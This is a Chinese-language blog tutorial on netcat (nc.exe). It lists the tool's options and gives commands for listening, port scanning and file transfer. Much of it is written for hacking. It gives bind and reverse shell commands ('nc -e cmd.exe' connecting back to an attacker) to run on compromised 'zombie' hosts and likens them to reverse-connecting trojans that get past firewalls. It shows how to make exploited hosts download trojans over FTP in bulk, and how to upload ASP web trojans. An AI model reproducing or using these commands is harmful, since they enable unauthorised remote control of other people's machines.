• 2_NC(瑞士军刀)


    瑞士军刀:nc.exe

    参数说明:
    -h 查看帮助信息
    -d 后台模式
    -e prog程序重定向,一但连接就执行[危险]
    -i secs延时的间隔
    -l 监听模式,用于入站连接
    -L 监听模式,连接天闭后仍然继续监听,直到CTR+C
    -n IP地址,不能用域名
    -o film记录16进制的传输
    -p[空格]端口 本地端口号
    -r 随机本地及远程端口
    -t 使用Telnet交互方式
    -u UDP模式
    -v 详细输出,用-vv将更详细
    -w数字 timeout延时间隔
    -z 将输入,输出关掉(用于扫锚时)

    -----

    命令1:监听命令
    nc -l -p port
    nc -l -p port > e:/log.dat
    nc -l -v -p port

    参数解释:
    -l:监听端口,监听入站信息
    -p:后跟本地端口号
    -v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息
    提示:一般大家都爱用-vv
    nc -l -p 80
    这个很简单,监听80端口
    如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!
    nc -l -p 80 > e:/log.dat
    功能和上边一样,但是后边加了个“> e:/log.dat”我想,学过ECHO
    那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件
    nc -l -v -p 80
    和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC
    的屏幕上。
    nc -l -v -p 80
    然后在浏览器中输入本机IP:127.0.0.1

    命令2:程序定向
    nc -l -p port -t -e cmd.exe
    本地机: nc -l -p port 或 nc -l -v -p port
    目标机:nc -e cmd.exe ip port
    参数解释:
    -l、-p两个参数已经解释过了
    -e;作用就是程序定向
    -t:以telnet的形式来应答
    例子
    nc -l -p 5277 -t -e cmd.exe
    知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器
    就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的
    入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。
    说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。。
    呵呵,咱们来找台肉鸡试试,我TELNET IP 5277
    local machine:nc -l -p port ( or nc -l -v -p port )
    remote machine:nc -e cmd.exe ip port
    大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,
    什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说
    不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你
    这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。
    这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?
    nc -l -p 5277 (坚听本地5277端口)
    同样也可以用
    nc -l -v -p 5277
    运行在本地
    然后在远程机器上,想办法运行
    nc -e cmd.exe ip 5277
    (你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!
    呵,看看在本地机器上出现了什么?
    这样就是反弹~~在本地机器上得到了一个SHELL


    命令3:扫描端口
    nc -v ip port
    nc -v -z ip port-port
    nc -v -z -u ip port-port
    参数解释:
    -z:将输入输出关掉,在扫描时使用
    nc -v ip port
    这个命令是针对某一个端口进行扫描
    例如:
    nc -v ip 135
    扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息
    例如:80端口
    我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息
    nc -v -z ip port-port
    这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围
    例如:
    nc -v -z ip 1-200
    可以看到我机器上的1-200的TCP端口的开放情况
    nc -v -z -u ip port-port
    这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的
    例如:
    nc -v -z -u ip 1-200
    这个命令就会扫1-200的UDP端口


    命令4:传送文件(HOHO,I LIKE)
    LOCAL MACHINE:nc -v -n ip port < x:/svr.exe
    REMOTE MACHINE:nc -v -l -p port > y:/svr.exe
    参数解释:
    -n:指定数字的IP地址
    这两个命令结合起来是用来传送文件的
    首先,在远程机上运行命令:
    nc -v -l -p 5277 > c:/pulist.exe
    这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口
    并把接受到的信息数据写到c:/pulist.exe中
    这时候在本地机上运行
    nc -v -n ip 5277 < e:/hack/pulist.exe
    这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上
    这样远程主机就会自动创建一个pulist.exe文件

    --------

    先看一些简单的用法:

    nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

    nc -l -p 80 开启本机的TCP 80端口并监听

    nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

    高级用法:

    nc -L -p 3389 做蜜罐,不停地监听3389端口

    nc -L -p 3389>c:log.txt 做蜜罐,不停地监听3389端口,同时把结果输出到c:log.txt

    nc -L -p 3389<c:ftp.txt 不停地监听3389端口,并把c:ftp.txt中内容发给连接本端口的主

    机,可起到传送文件作用.(此用法经常用于反向溢出)

    nc -l -p 2008 -t -e cmd.exe 绑定主机的cmd到2008端口,并以TELNET方式应答。

    nc -t -e cmd.exe 192.168.0.2 555 绑定cmd反向连接192.168.0.2的555端口以TELNET方式应答。

    组合用法:

    1.溢出用:

    nc -L -p 8989<c:ftp.txt (ftp.txt中为FTP自动下载命令)

    效果:一但溢出的主机连接8989端口就会自动用FTP下载指定的文件,如木马.(此法经常用于批量溢出)

    2.返回CMD SHELL用:

    正向连接:

    在远程主机上运行 nc -l -p 2008 -t -e cmd.exe

    本机运行 nc -nvv 192.168.0.1 2008

    连接成功就会返回一个CMD shell。(类似TELNET)

    反向连接:

    先在本机运行 nc -l -p 2008

    在远程主机上运行 nc -t -e cmd.exe 192.168.0.2 2008

    连接成功就会得到一个CMD shell。(类似TELNET)

    3.上传文本

    本机运行 nc -vv www.baidu.com 80<1.txt (此法经常用于上传ASP木马)

    本机运行 nc -nvv 192.168.0.1 80<1.txt (向192.168.0.1发送1.txt中的内容)

     

    有时间会录下视频发布

  • 相关阅读:
    【转】ios输入框被键盘挡住的解决办法
    【转】操作系统Unix、Windows、Mac OS、Linux的故事
    mac 下删除非空文件夹
    解决Win7 64bit + VS2013 使用opencv时出现提“应用程序无法正常启动(0xc000007b)”错误
    图的邻接表表示
    图的邻接矩阵表示
    并查集
    05-树9 Huffman Codes及基本操作
    05-树7 堆中的路径
    堆的操作集
  • 原文地址:https://www.cnblogs.com/zoushou/p/4125090.html
Copyright © 2020-2023  润新知